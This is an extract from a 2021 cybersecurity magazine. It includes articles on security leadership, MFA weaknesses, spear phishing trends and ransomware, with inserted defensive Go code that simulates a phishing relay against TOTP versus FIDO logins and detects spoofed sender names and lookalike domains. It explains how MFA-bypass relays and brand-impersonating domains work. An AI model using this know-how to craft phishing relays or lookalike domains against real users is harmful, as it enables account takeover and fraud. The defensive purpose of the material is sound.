Leaders across each and every industry I've worked in are the ones who set the tone for how their teams engage with challenges, solutions and risks. A culture of security awareness and protection starts at the top.

Their willingness to learn about cybersecurity can make a huge difference in the way the team approaches education and awareness. Cybersecurity training is often treated as a one-time, brief session covering the basics such as password best practices and how to recognize phishing attacks. While this approach can be educational, it lacks engagement. Organisations typically treat cybersecurity training as a 'box ticking' exercise, where employees are asked to complete a training session and the job is assumed to be done. In reality, employers should be creating a culture that helps people identify security challenges while also investing in the right technologies.
Moreover, having a supportive and collaborative leadership team is crucial to creating a strong sense of involvement around cybersecurity. This involves taking a zero-trust approach to cybersecurity by assuming that there could always be risks. According to a 2020 Insider Threat Report, 68% of organisations reported that insider attacks were becoming more frequent. Putting that approach into practice involves having clear on-boarding and off-boarding procedures for employees, hosting clear cybersecurity training sessions, regularly changing passwords, and having two-factor authentication on at all times. In addition, businesses should be aware of the best possible technological solutions.
Taking Initiative with Cybersecurity Protection and Risk Factor Awareness

In addition, many organisations struggle with corporate procrastination around cybersecurity issues, which can lead to major repercussions down the line. Issues should be addressed head on. There are many relevant examples of this, such as an employee putting off changing passwords or implementing two-factor authentication. The number of stolen passwords and usernames in circulation has increased by 300% since 2018 (Digital Shadows Research Team). Passwords are shared between personal and work devices and are often written down in plain sight rather than secured with a password manager. This further underlines the importance of taking a proactive approach to cybersecurity measures. Passwords should be regularly changed and updated, and leadership teams should be taking these extra steps.
Another way leaders can take initiative in cybersecurity protection is by implementing proactive tools that work to prevent the problem before it arises. For example, Content Disarm and Reconstruction (CDR) technology removes potential threats from every file by inspecting, cleaning, and rebuilding files to a "known good" standard.

Although some organisations may take some precautions, a leader or leadership team may not always understand the risks and how they should be addressed. For example, leaders may comprehend that ransomware attacks are on the rise but cannot translate that into the risks it presents to their own networks. Cybersecurity concerns should be addressed directly by preparing to implement change. This is not just about investing in technology but is about identifying the risk factors associated with major problems such as ransomware and phishing. While effective cybersecurity is built around strong technological solutions, organisations that are aware and ready to address these issues will always be better prepared.
Clear Communication and Collaboration<br />
One of the biggest challenges and crucial values in the workplace is direct, honest communication and<br />
collaboration. In many organisations across sectors, there is a serious disconnect between leadership<br />
and other vital stakeholders. For example, some leaders view cybersecurity as an IT problem, and as a<br />
result, keep important issues at arm's length. They may not prioritize cybersecurity investment in the<br />
same way because it does not show a tangible ROI in most cases.<br />
There is still a large number of organisations that could benefit from prioritizing cybersecurity at a<br />
leadership level. Improving communication efforts between all parties is crucial to protect from growing<br />
cybersecurity risks. The estimated cost of cybercrime exceeded $1 trillion globally in 2020, more than a<br />
50% increase in two years (The Hidden Costs of Cybercrime, McAfee). It is better for organisations to be<br />
prepared by investing in cybersecurity best practices before it’s too late.<br />
Ultimately, organisations can improve their approaches to cybersecurity as a whole by staying up to date<br />
on the latest threats, modernising cybersecurity training and technology and ensuring everyone from the<br />
board and executives to the security analysts themselves have a clear cut, coordinated plan in place. It’s<br />
no simple task, but after decades working in international relations, finance and technology and observing<br />
security practices across them all, I can assure you these steps will put your team on the right path.<br />
About the Author<br />
Danny Lopez is the CEO at Glasswall. Danny has enjoyed a<br />
successful international career to date in banking, marketing,<br />
diplomacy, and technology. Danny is the CEO of award-winning<br />
cyber security firm Glasswall, which delivers unique protection<br />
against sophisticated threats through its ground breaking<br />
technology. For two years up until August 2018 Danny was the<br />
COO at Blippar, a UK-based augmented reality (AR) pioneer.<br />
Between 2011 and 2016 Danny was the British Consul General<br />
to New York and Director General for trade and investment<br />
across North America. Before this diplomatic posting, Danny<br />
was appointed by the Mayor of London as the inaugural CEO of<br />
London & Partners, the UK capital’s official promotional agency. Previously, Danny was a Managing<br />
Director at the UK government’s Department for International Trade. The first ten years of Danny’s career<br />
were at Barclays Bank, where he held several senior international positions in corporate and investment<br />
banking in London, New York, Miami, and Mumbai. Danny is a Non-Executive Director at Innovate<br />
Finance – the UK industry body championing global FinTech – and a special advisor to New York-based<br />
venture capital firm, FinTech Collective. He is also a Council Member and Trustee at the University of<br />
Essex, his alma mater. Danny speaks regularly on platforms across the world on topics including<br />
geopolitics and the intersection of market disrupting technologies and government policy. Danny holds<br />
a Bachelor of Arts degree in economics and a Master’s degree in international economics and finance<br />
from the University of Essex. Born in England, Danny grew up in Spain and is a fluent Spanish speaker.<br />
Danny and his Australian wife Susan live in London with their three children. Danny can be reached<br />
online at @GlasswallCDR and at our company website www.glasswallsolutions.com<br />
How Covid-19 Changed Advertising Forever<br />
By Bernie Brode, product researcher at Microscopic Machines<br />
There has been much written about how the Covid-19 pandemic has exacerbated inequality. Across the<br />
world, the virus exposed just how unprepared some countries, communities, and companies were for<br />
crisis, and those with the fewest resources were invariably those that were least able to respond.<br />
The same was true of advertisers.<br />
At the broadest level, the pandemic forced most brands to shift most of their marketing online. Some<br />
advertising agencies and platforms were ready for this, and some weren’t. This meant that, during the<br />
two long years of lockdowns and remote working, the agencies that were already in a strong digital<br />
position consolidated that position, because those that weren’t failed to survive.<br />
The firms that have survived face a radically different market, with several advertising technologies<br />
spiking in popularity. In this article, we’ll look at three of the most important, and explain what this<br />
increased popularity means for the future of advertising.<br />
Connected TV<br />
It might seem strange to start this list with Connected TV – a relatively small part of the media landscape,<br />
and one that advertisers have been slow to embrace. But the importance of advertising on streaming<br />
services was hugely increased by the pandemic, and specifically by a strange coincidence. This is that a<br />
number of much anticipated streaming services were already due to launch during the period of stay-at-home<br />
orders.<br />
These services include NBCUniversal’s Peacock and WarnerMedia’s HBO Max, both of which had the<br />
“good fortune” to launch at a time when there was a large and almost captive audience for this.<br />
Unsurprisingly, this led to the launch of both services going unexpectedly well. Some analysts have even<br />
spoken about a “revolution” in the TV industry, in which a long-term trend away from “traditional” cable<br />
and satellite television companies has become an abrupt abandonment.<br />
Audience figures certainly give credence to this view. Across the US, cord-cutting spiked during the<br />
pandemic: eMarketer forecast late last year that more than 6 million U.S. households had canceled<br />
their pay TV subscriptions last year, with TV ad spend dropping 15%, to its lowest level since 2011. This<br />
is not a short-term process, of course. But until now, it was expected that advertisers would have another<br />
decade – at least – to transition away from making TV ads, and gain expertise in new media. That time<br />
is now upon us, much earlier than some had hoped.<br />
This doesn’t mean, of course, that video marketing will die. Far from it. And in fact, with the rise of TikTok<br />
and similar apps over the past year, it could be said that we are entering a golden age for video marketing.<br />
However, advertisers will need to quickly gain (or hire) expertise in these “new” video platforms in order<br />
to take advantage of them, and ensure that their content stays relevant.<br />
E-Commerce<br />
The second big pandemic-driven shift in the last two years has been the rise and rise of e-commerce<br />
platforms. This, again, was not a trend that was invisible before the pandemic, but it is one that the virus<br />
accelerated rapidly. In short, e-commerce platforms are quickly becoming the standard way to purchase<br />
goods and services, with IRL stores needing to offer something extra to justify their existence.<br />
In principle, this is great news for advertising companies, or at least those capable of designing, making,<br />
and delivering digital ads. eMarketer forecast in the fall that marketers would spend $17.37 billion in<br />
advertising on e-commerce sites and apps in 2020, up 38% from 2019. More recent figures, showing a<br />
huge increase in the volume of online sales during the pandemic, and sustained afterward, have led<br />
some to conclude that the retail industry has changed forever.<br />
However, this shift might not be such a simple one for advertisers. Many of these new e-commerce<br />
platforms are keen to handle promotion and advertising themselves, and in fact offer this to sellers as the<br />
primary advantage of their platforms. At the same time, more customers than ever are using ad blockers.<br />
This means that the “traditional” way in which advertising reaches consumers in the digital space is<br />
quickly becoming unfeasible, and unprofitable.<br />
Because of this, advertisers may find themselves becoming experts in the “dark arts” of e-commerce<br />
promotion. We are fast entering a world, in other words, in which customer reviews and SEO replace<br />
creative copy and marketing design.<br />
Flexibility<br />
Ultimately, however, the most important way in which the pandemic may have changed the advertising<br />
industry is by highlighting how quickly economic conditions can change. The firms which performed best<br />
over the past two years were those that were able to quickly pivot to new ways of working, and new ways<br />
of reaching their audiences.<br />
While for small firms this may have been a relatively straightforward shift, larger firms found it very difficult.<br />
Forrester Research forecast last year that the U.S. ad agency sector would lay off 52,000 jobs in 2021<br />
and 2022 amid spending cuts. Flexible marketing organizations have been one place those workers could<br />
turn, but many have left the industry permanently.<br />
These workers are going to be replaced by advertisers who came of age during the pandemic, and who<br />
see the value of embedded digital marketing. And dollars began to shift over to creators even more: A<br />
report from influencer marketing platform CreatorIQ said sponsored posts were up 46.6% year-over-year<br />
during the post-Thanksgiving sales weekend. This will be the legacy of the pandemic on the industry,<br />
and one that will shape it for years to come.<br />
The Future<br />
The pandemic has caused major changes in the industry, and accelerated some that were already<br />
apparent. Certain pieces of the ad industry were catapulted years forward as consumers stayed at home<br />
during the pandemic. Digital reigned supreme: Flexible buys, an ability to switch out messaging and<br />
direct-response buys that clearly showed return-on-investment were in high-demand by many advertisers<br />
who often had no idea what the next month, or even the next week, would look like.<br />
And that’s the new reality that we all have to live with.<br />
About the Author<br />
Bernard Brode is a product researcher at Microscopic<br />
Machines and remains eternally curious about where the<br />
intersection of AI, cybersecurity, and nanotechnology will<br />
eventually take us.<br />
Bernie can be reached online at bernie.l.brode@gmail.com<br />
and https://twitter.com/berniebrode?lang=en.<br />
Why MFA Alone Isn’t Enough for True Cybersecurity<br />
By Bojan Simic, Co-Founder, Interim CEO & CTO, HYPR<br />
Multi-factor authentication (MFA) was once foreign terminology, but today, with the myriad of hacks<br />
and data breaches dominating headlines, it’s fair to say that most individuals now see MFA as a no-brainer<br />
– for now. When thinking about MFA, both companies and consumers alike consider it to be a<br />
safer, more secure option. And while that isn’t necessarily untrue (as it is safer than single-factor<br />
authentication), it doesn’t bypass the increasingly large password issue developing across digital<br />
mediums. In fact, despite widespread MFA adoption, account takeover fraud generated a $3.3 billion loss<br />
in 2020.<br />
Ever since the “password” was invented in the 1960s, it has been a topic of contention. The intent, always<br />
positive; but the efficacy, an ongoing debate – especially with the pace at which technology is evolving.<br />
As it stands today, there are three different kinds of MFA, the first being One-Time Passwords (OTP).<br />
An OTP is a string of digits that is provided to a user via an app after they have entered a username and<br />
password; however, OTPs are still based on passwords (it’s in the name, after all!) and are therefore<br />
subject to MFA phishing, mobile malware and keyloggers.<br />
The second kind of MFA is SMS two-factor authentication (the most common OTP delivery method<br />
today), wherein OTP are delivered to a user’s smartphone via text. Again, due to error or malicious<br />
activity, OTP can be delivered to the wrong mobile number or a stolen mobile phone or intercepted via<br />
SS7 network attacks. In fact, the National Institute of Standards and Technology (NIST) stopped<br />
recommending the use of SMS as a strong second factor back in 2016!<br />
And finally, PUSH authentication is another mobile-centric authentication method whereby the service<br />
provider sends the user a notification to their mobile phone. The user then has to tap the screen to get<br />
access to the account. And while PUSH authentication can be used as part of a passwordless system if<br />
the solution is built upon PKI or certificate-based authentication, most PUSH authentication is an MFA<br />
mode layered on top of additional shared secrets, including (you guessed it) a password.<br />
Unfortunately, many hackers have learned how to bypass traditional MFA, including intercepting,<br />
phishing and spoofing SMS text messages; many also engage in SIM swapping, wherein a hacker<br />
impersonates the target to dupe a wireless carrier employee into porting the phone number associated<br />
with their SIM card to a new (malicious) device. Moreover, there are also new tools – e.g., Modlishka – that<br />
automate phishing attacks that bypass MFA. It couldn’t be easier for hackers nowadays.<br />
So, the question is, how do we move away from passwords yet still ensure enterprise level<br />
security?<br />
Every individual today is experiencing a certain level of MFA fatigue. Add to that the fact that every<br />
business, big and small, is maneuvering through the complex authentication landscape, while now<br />
managing the IT challenges of remote work. In fact, enterprise IT helpdesk departments spend more than<br />
30% of their time helping users with password and access issues, which prevents them from making<br />
progress on innovative projects that ultimately move the business forward. So, despite being mandated,<br />
MFA still carries a level of resistance.<br />
The solution? Marrying MFA with passwordless authentication. In short, combining MFA technology with<br />
a biometric login (think facial recognition). This concept removes any type of shared secret and eliminates<br />
the transmission or storing of credentials, thus removing the “man in the middle” and reducing the attack<br />
surface. By simply using a smartphone, security key, or platform authenticator, users can securely log<br />
into a workstation and corporate domain, without ever typing in a password. Passwordless authentication<br />
removes user frustration while ensuring the highest level of password security – by eliminating the<br />
password altogether. Leading companies such as Aetna/CVS Health, most major banks in the United<br />
States, airlines and insurance companies have all adopted passwordless technologies.<br />
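The difference the article draws between OTP-based MFA and a passwordless, public-key login, shown as an added Go example that is not code from the article or from HYPR. A TOTP code is derived from a secret the server shares with the user's app, so the server can only check the digits; a phishing proxy that relays them within the time step is accepted. A FIDO-style assertion instead signs the server's challenge together with the origin the browser is on, so the same relay produces a signature over the lookalike origin and is rejected. The origins, the demo secret and the simplified origin binding (real WebAuthn does this through clientDataJSON) are constructed assumptions.<br />

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha1"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
)

// totp derives a six-digit RFC 6238 code (SHA-1, 30-second step) from a secret both the user's app
// and the server hold. The server checks the digits but cannot tell where they were typed, so a
// phishing proxy that relays them within the step is indistinguishable from the user.
func totp(secret []byte, unixTime int64) string {
	var msg [8]byte
	binary.BigEndian.PutUint64(msg[:], uint64(unixTime/30))
	mac := hmac.New(sha1.New, secret)
	mac.Write(msg[:])
	h := mac.Sum(nil)
	off := h[len(h)-1] & 0x0f
	code := binary.BigEndian.Uint32(h[off:off+4]) & 0x7fffffff
	return fmt.Sprintf("%06d", code%1000000)
}

// VerifyTOTP is the server-side check.
func VerifyTOTP(secret []byte, code string, unixTime int64) bool {
	return hmac.Equal([]byte(totp(secret, unixTime)), []byte(code))
}

// Authenticator models a FIDO-style device: the private key never leaves it and the relying
// party (RP) stores only the public key, so there is no shared secret to phish or leak.
type Authenticator struct{ priv *ecdsa.PrivateKey }

func NewAuthenticator() (*Authenticator, error) {
	k, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	return &Authenticator{priv: k}, nil
}

// PublicKey is what the RP registers for this user.
func (a *Authenticator) PublicKey() *ecdsa.PublicKey { return &a.priv.PublicKey }

// assertionDigest binds the RP's challenge to the origin the browser is actually on (a
// simplified stand-in for WebAuthn's clientDataJSON).
func assertionDigest(challenge []byte, origin string) [32]byte {
	return sha256.Sum256(append([]byte(origin+"\x00"), challenge...))
}

// Sign produces the assertion; the browser, not the user, supplies the origin, so a user on a
// lookalike site unknowingly signs the lookalike's origin.
func (a *Authenticator) Sign(challenge []byte, origin string) ([]byte, error) {
	d := assertionDigest(challenge, origin)
	return ecdsa.SignASN1(rand.Reader, a.priv, d[:])
}

// VerifyAssertion is the RP check: only a signature over its own origin is accepted.
func VerifyAssertion(pub *ecdsa.PublicKey, challenge []byte, rpOrigin string, sig []byte) bool {
	d := assertionDigest(challenge, rpOrigin)
	return ecdsa.VerifyASN1(pub, d[:], sig)
}

// RelayResult records whether a phishing proxy relaying a login is accepted by each scheme.
type RelayResult struct{ TOTPRelayAccepted, FIDOLegitAccepted, FIDORelayAccepted bool }

// RelayScenario runs both flows against a hypothetical RP origin and a hypothetical lookalike.
func RelayScenario() (RelayResult, error) {
	const rpOrigin, phishOrigin = "https://login.example.test", "https://login.examp1e.test"
	var r RelayResult
	secret := []byte("12345678901234567890") // constructed demo secret (the RFC 6238 test value)
	now := int64(59)
	phished := totp(secret, now) // the code the user typed into the lookalike site
	r.TOTPRelayAccepted = VerifyTOTP(secret, phished, now)
	auth, err := NewAuthenticator()
	if err != nil {
		return r, err
	}
	challenge := make([]byte, 32)
	if _, err := rand.Read(challenge); err != nil {
		return r, err
	}
	legit, err1 := auth.Sign(challenge, rpOrigin)
	relayed, err2 := auth.Sign(challenge, phishOrigin) // same challenge, signed at the wrong origin
	if err1 != nil || err2 != nil {
		return r, fmt.Errorf("sign: %v %v", err1, err2)
	}
	r.FIDOLegitAccepted = VerifyAssertion(auth.PublicKey(), challenge, rpOrigin, legit)
	r.FIDORelayAccepted = VerifyAssertion(auth.PublicKey(), challenge, rpOrigin, relayed)
	return r, nil
}

func main() {
	r, err := RelayScenario()
	fmt.Println(r, err)
}
```

RelayScenario returns TOTPRelayAccepted and FIDOLegitAccepted true and FIDORelayAccepted false; totp reproduces the RFC 6238 SHA-1 test vector for time 59 (94287082 in eight digits, 287082 in six). The point the article makes about shared secrets is visible in the types: the server-side TOTP check needs the same secret the user holds, while VerifyAssertion needs only a public key and its own origin.<br />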
Moving forward, passwordless authentication will certainly be the norm, particularly since the Federal<br />
Financial Institutions Examination Council (FFIEC) recently issued guidance on effective authentication<br />
and access risk management practices for the various parties that access financial institution services<br />
and systems. Microsoft, in particular, is taking the lead in incorporating this technology and making it non-negotiable<br />
for entities with data to secure (or, all entities). In fact, a Digital Defense Report recently<br />
distributed by Microsoft shows continued attacks from other nation-states that weren’t necessarily via<br />
exploitations of software, but rather well-known techniques such as password spray and phishing. This<br />
just highlights how vulnerable most organizations are to attacks, and how widespread the antiquated use<br />
of passwords is amongst the population.<br />
With the number of digital touchpoints increasing for companies across the board, MFA alone – and MFA<br />
rooted in password security – will continue to become less and less secure for both brands and<br />
consumers. With countless pieces of data and dollars to lose, neither party can afford to put their<br />
information at risk. Under the FFIEC’s guidance, and with Microsoft at the forefront, passwordless MFA is<br />
the way of the future.<br />
About the Author<br />
Bojan Simic is the Interim CEO, Chief Technology<br />
Officer and Co-Founder of HYPR. Previously, he<br />
served as an information security consultant for<br />
Fortune 500 enterprises in the financial and insurance<br />
verticals conducting security architecture reviews,<br />
threat modeling, and penetration testing. Bojan has a<br />
passion for deploying applied cryptography<br />
implementations across security-critical software in both the public and private sectors. His extensive<br />
experience in decentralized authentication and cryptography has served as the underlying foundation<br />
for HYPR technology. Bojan also serves as HYPR’s delegate to the FIDO Alliance board of directors,<br />
empowering the alliance’s mission to rid the world of passwords.<br />
Bojan can be reached online on LinkedIn, Twitter and at our company website https://www.hypr.com.<br />
Can Your Cybersecurity Culture Stand Up to the Latest<br />
Spear Phishing Techniques?<br />
By Josh Yavor, Chief Information Security Officer, Tessian<br />
Gone are the days of bulk spear phishing attacks, where hackers send scam emails and malicious<br />
attachments to as many people as possible and hope for a bite. Spear phishing techniques are growing<br />
more targeted and sophisticated, according to new data from Tessian that sheds light on the latest attack<br />
methods.<br />
Tessian’s report analyzed two million malicious emails that bypassed traditional email defenses like<br />
secure email gateways within the past year. It found that hackers are targeting employees with more<br />
tailored emails that reap big rewards, like wire transfer fraud. Account takeover attacks are also a major<br />
threat that costs businesses $12,000 on average.<br />
With emails bypassing defenses, humans are left as organizations’ last line of defense against these<br />
email scams. But it’s unreasonable to expect each employee to be a cybersecurity expert and identify<br />
these attacks every time. Instead, organizations must build a strong cybersecurity culture that<br />
encourages people to flag suspicious activity and empowers them with the tools they need to stay secure<br />
on channels like email. This starts with understanding the latest threats and building a cybersecurity<br />
culture around them.<br />
The State of Spear Phishing<br />
Who is being targeted and when?<br />
Tessian’s report found that the average employee receives 14 malicious emails per year, but that number<br />
jumps significantly for highly targeted industries. For example, retail employees received 49 malicious<br />
emails per year, while manufacturing employees received 31. Those sectors are also experiencing<br />
staffing shortages from The Great Resignation, leaving employees stressed, distracted and potentially<br />
more vulnerable to falling for a scam. These risks must be prioritized as companies navigate hiring and<br />
turnover challenges.<br />
Bad actors try to trick employees by sending malicious emails in the late afternoon, hoping to slip past a<br />
tired or distracted employee. The most common times for spear phishing emails to be sent were 2 p.m.<br />
and 6 p.m. Bad actors also take advantage of the holidays by offering “too good to be true” deals. The<br />
biggest spike in malicious emails came immediately before and after Black Friday.<br />
What’s the latest attack playbook?<br />
Impersonation techniques continue to be a go-to strategy in the spear phishing playbook. Tessian found<br />
that display name spoofing was the most common tactic, found in 19% of malicious emails. These attacks<br />
use deceptive display names on an email to mislead employees. For example, a display name might<br />
show the first and last name of the company's Chief Financial Officer requesting a wire transfer. While<br />
the email address itself may still look suspicious, a recipient often only looks at the name of the sender<br />
and could mistake it for a legitimate request.<br />
Domain impersonation, on the other hand, happens when bad actors secure a domain that looks like it<br />
belongs to a legitimate business. This technique was used in 11% of malicious emails. The brands most<br />
likely to be impersonated were Microsoft, ADP, Amazon, Adobe Sign and Zoom.<br />
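The two impersonation tactics just described, display name spoofing and domain impersonation, as added detection logic in Go that is not part of the article or of any Tessian product. Inspect parses a From: header and flags a known internal name on an address outside the company's domain, and a sender domain whose labels are confusable, superstring or one-edit variants of a protected brand. The policy (the hypothetical own domain example.test and CFO "Jane Doe", and brand domains assumed for the five brands the report names), the From: headers and the small confusables table are all constructed.<br />

```go
package main

import (
	"fmt"
	"net/mail"
	"strings"
)

// Finding is one matched rule: "display-name-spoofing" or "domain-impersonation".
type Finding struct{ Rule, Detail string }

// Policy is the defender's knowledge: own domain, names likely to be impersonated, protected brands.
type Policy struct {
	OwnDomain              string
	VIPNames, BrandDomains []string
}

// SamplePolicy is constructed for the demo: domain and VIP are hypothetical, brand domains assumed.
func SamplePolicy() Policy {
	return Policy{
		OwnDomain:    "example.test",
		VIPNames:     []string{"Jane Doe"}, // hypothetical CFO
		BrandDomains: []string{"microsoft.com", "adp.com", "amazon.com", "adobesign.com", "zoom.us"},
	}
}

// SampleHeaders are constructed From: headers, not taken from any real message.
var SampleHeaders = []string{
	`"Jane Doe" <jane.doe@gmail-mail.test>`,                    // CFO's name on an external mailbox
	`"Microsoft Account Team" <no-reply@rnicrosoft-login.com>`, // "rn" standing in for "m"
	`"Zoom" <noreply@zoom.us.invite-link.test>`,                // brand domain used as a subdomain prefix
	`"Jane Doe" <jane.doe@example.test>`,                       // genuine internal sender
}

func normalizeName(s string) string { return strings.Join(strings.Fields(strings.ToLower(s)), " ") }

// underDomain reports whether domain is d itself or a subdomain of d.
func underDomain(domain, d string) bool { return domain == d || strings.HasSuffix(domain, "."+d) }

// skeleton folds common confusables so "rnicr0soft" equals "microsoft" (a stand-in for a full table).
func skeleton(s string) string {
	return strings.NewReplacer("rn", "m", "0", "o", "1", "l", "vv", "w").Replace(strings.ToLower(s))
}

func min2(x, y int) int { if x < y { return x }; return y }

// levenshtein is the edit distance, used to catch one-character typosquats.
func levenshtein(a, b string) int {
	prev, cur := make([]int, len(b)+1), make([]int, len(b)+1)
	for j := range prev {
		prev[j] = j
	}
	for i := 1; i <= len(a); i++ {
		cur[0] = i
		for j := 1; j <= len(b); j++ {
			cost := 0
			if a[i-1] != b[j-1] {
				cost = 1
			}
			cur[j] = min2(min2(prev[j], cur[j-1])+1, prev[j-1]+cost)
		}
		prev, cur = cur, prev
	}
	return prev[len(b)]
}

// Inspect parses one From: header and applies both rules; nil means nothing matched.
func Inspect(p Policy, fromHeader string) ([]Finding, error) {
	addr, err := mail.ParseAddress(fromHeader)
	if err != nil {
		return nil, err
	}
	domain := strings.ToLower(addr.Address[strings.LastIndex(addr.Address, "@")+1:])
	var out []Finding
	// Rule 1: a known internal name on an address outside our own domain.
	if name := normalizeName(addr.Name); name != "" && !underDomain(domain, p.OwnDomain) {
		for _, vip := range p.VIPNames {
			if name == normalizeName(vip) {
				out = append(out, Finding{"display-name-spoofing", fmt.Sprintf("%q sent from external %s", addr.Name, addr.Address)})
			}
		}
	}
	// Rule 2: a non-TLD label that is a confusable, superstring or one-edit variant of a brand
	// label, on a domain that is neither the brand nor one of its subdomains.
	labels := strings.Split(domain, ".")
	for _, brand := range p.BrandDomains {
		if underDomain(domain, brand) {
			continue
		}
		want := skeleton(strings.Split(brand, ".")[0])
		for _, l := range labels[:len(labels)-1] {
			if got := skeleton(l); strings.Contains(got, want) || levenshtein(got, want) <= 1 {
				out = append(out, Finding{"domain-impersonation", fmt.Sprintf("%s resembles %s", domain, brand)})
				break
			}
		}
	}
	return out, nil
}

func main() {
	for _, h := range SampleHeaders {
		f, err := Inspect(SamplePolicy(), h)
		fmt.Println(h, "->", f, err)
	}
}
```

Against the constructed headers the first three each yield one finding (display-name-spoofing, then domain-impersonation twice) and the internal sender yields none. In production the VIP list, brand list and confusables table would come from a maintained source, and the findings would feed a mail gateway or SIEM rule rather than stdout; the short brand labels (such as "adp") are where a superstring rule like this one produces the most false positives and would need tuning.<br />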
What are bad actors after?<br />
Tessian’s analysis found that tricking users into downloading malware remains a common motive of<br />
phishing emails. Malicious links still prove to be a popular and effective technique, with almost half (44%)<br />
of malicious emails containing a URL.<br />
Our researchers found more emails related to wire transfers than credential theft, suggesting<br />
cybercriminals are still largely focused on financial gain. For example, they’re more likely to try to steal<br />
money by impersonating a vendor and requesting a payment than by posing as an IT person requesting<br />
an employee’s password.<br />
Building a Cybersecurity Culture from The Ground Up<br />
These attacks are evolving and growing more sophisticated every day. Having a strong cybersecurity<br />
culture is more important than ever to ensure employees can work both securely and productively. Rather<br />
than getting in their way, an effective cybersecurity culture treats employees as part of the solution while<br />
providing the tools they need to stay secure.<br />
This involves a layered approach, starting with creating a transparent, shame-free environment that<br />
encourages employees to admit to mistakes or share when something feels off. Unless employees feel<br />
comfortable flagging suspicious emails or alerting IT when they’ve clicked a malicious link, security<br />
teams won’t know how or when they are being targeted. Essentially, they’ll have zero visibility into these<br />
threats.<br />
The next step is relevant, ongoing training. Employees should be trained using the latest and most<br />
relevant examples, such as real-world phishing emails. For example, they should see real examples of<br />
those “too good to be true” scams before the holiday season and should know to look out for spear<br />
phishing emails late in the afternoon. Automation and machine learning tools can also be used to provide<br />
in-the-moment training tailored to specific employees based on their role, tenure and location.<br />
But even with training, people will make mistakes like clicking a malicious link or sharing login credentials.<br />
Businesses need to take an advanced approach to email security to stop the threats that do get through.<br />
Relying on employees to identify and outwit threats 100% of the time will leave an organization<br />
vulnerable. The right security tools can provide an added layer of defense and support employees without<br />
disrupting their workflow.<br />
About the Author<br />
Josh Yavor is CISO at Tessian, leading information security,<br />
threat intelligence, and security research. Most recently he<br />
served as CISO for Cisco Secure and led cloud security for<br />
Duo Security, with earlier stops at Facebook, Oculus, and iSEC<br />
Partners. Josh is an aspiring woodworker and recovering<br />
middle school teacher. Learn more about Josh on Twitter and<br />
at Tessian.com.<br />
3 Best Practices to Avoid Inevitable Ransomware Attacks<br />
Tips to mitigate and protect against the ongoing threats of ransomware<br />
By Jesper Zerlang, CEO, LogPoint<br />
The total cost of ransomware in 2021 totals $20B and is expected to climb to $265B by 2031. With new<br />
ransomware attacks occurring every 11 seconds and the average incident resulting in nearly $700,000<br />
in damages, no industry is safe from the war against ransomware. In 2021 alone there have been<br />
headline-breaking ransomware attacks on large organizations such as Colonial Pipeline, Brenntag, and JBS<br />
Foods.<br />
While cybercriminals rely on an array of tactics to breach a network, such as database hacking and<br />
denial-of-service attacks, phishing is the number one delivery method for ransomware. Throughout the<br />
pandemic, as the majority of businesses rapidly moved their workforce remote, the number of<br />
ransomware attacks only continued to climb, up 150% in 2020.<br />
These numbers aren’t slowing and it’s up to organizations to understand how they can protect their data<br />
and their employees’ information from a catastrophic attack, which could ultimately cost them millions.<br />
However, as the number of threats increases, businesses must look to find the right solutions to better<br />
protect, detect and respond to today’s complex threats. And while some require implementing new<br />
security tools and technology, others are as simple as changing protocols and priorities within the<br />
organization. Below are three tips to help any organization, large or small, in their efforts to increase<br />
cybersecurity and mitigate the risk of a ransomware attack.<br />
1. Build a strong cybersecurity foundation<br />
When thinking of cybersecurity, it’s natural to think of the innovative technologies available on the market<br />
today. However, there are so many steps that should be taken in-house to help to establish a secure<br />
network before introducing these additional technologies. Building the foundation for protecting your data<br />
starts with the basics, especially considering that these advanced technologies can only do so much if<br />
the foundation is not set.<br />
Patching, having secure configurations and following password best practices, such as ensuring strong<br />
password hygiene across the organization and incorporating two-factor authentication, are all basic<br />
needs to ensure a hacker cannot easily gain access to a network. While these may seem small, the<br />
protection they offer is mighty and effective, and with these measures in place, advanced technologies<br />
can be implemented in parallel to help build a stronger, forceful security posture for the overall<br />
organization.<br />
2. Stay “in the know”<br />
With the increase in cyberattacks, the government has been busy introducing new regulations and<br />
compliance standards. These will likely not go away – in fact, they will likely become stricter, with heavy<br />
fines for those organizations who do not comply. Being aware of the current state of the industry and the<br />
threats impacting fellow businesses can help you to understand what the risks are, how you can protect<br />
yourself and what may be introduced into the regulatory landscape in the near future.<br />
For example, it’s no secret that the need for a single platform that can both detect and respond to a threat<br />
is greater than ever before. Some organizations are finding that by integrating Security Information and<br />
Event Management (SIEM) with Security Operation Automation and Response (SOAR), they can help<br />
introduce the automation necessary to respond to even the most complex threats quicker than ever<br />
before, minimizing the need for human intervention. This reliable, automated protection enables<br />
organizations to respond in real-time and provides them with the situational awareness necessary to help<br />
predict the following phase of an attack.<br />
Technology like this is actively changing the industry and the way organizations prepare for ransomware attacks. Being aware of these innovations helps an organization understand their benefits, stay ahead of industry trends and be ready if these technologies become the regulatory expectation in cybersecurity.<br />
3. Don’t forget about transparency<br />
As with any business challenge, being open and communicative is the only way to ensure alignment across teams. From security operations to IT and enterprise risk management, aligning on objectives is critical to ensure every gap in the organization's protection is covered. Without consistent collaboration and transparency between departments, the likelihood of a successful attack only increases, putting the critical data inside the network at risk.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 64<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
For example, an employee may be targeted by a phishing scheme, recognize the warning signs, and simply delete the email. Shortly after, an employee in another department could receive the same email and fall for it. Departments tend to work in silos in the belief that cybersecurity sits with the IT team and the IT team alone. Yet if the first employee had reported the phishing email to the IT team, the rest of the organization could have been warned before the second employee fell victim. Cybersecurity is a team effort, and working together toward shared goals in the battle against ransomware is often one of the best forms of protection an organization has.<br />
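The scenario above, where one reported phishing email should trigger a warning for everyone else who received it, is exactly the correlation that the SIEM and SOAR integration described under point 2 automates. The following Python script is an added example written for this article, not LogPoint's product code: it parses constructed mail-gateway log lines (the log format, message ids and addresses are invented for the example), derives a campaign key from the sender domain, the normalized subject and the lure link's host, finds every other recipient of the same campaign and emits the containment actions a playbook would run.<br />

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed mail-gateway log for this example (format and addresses are
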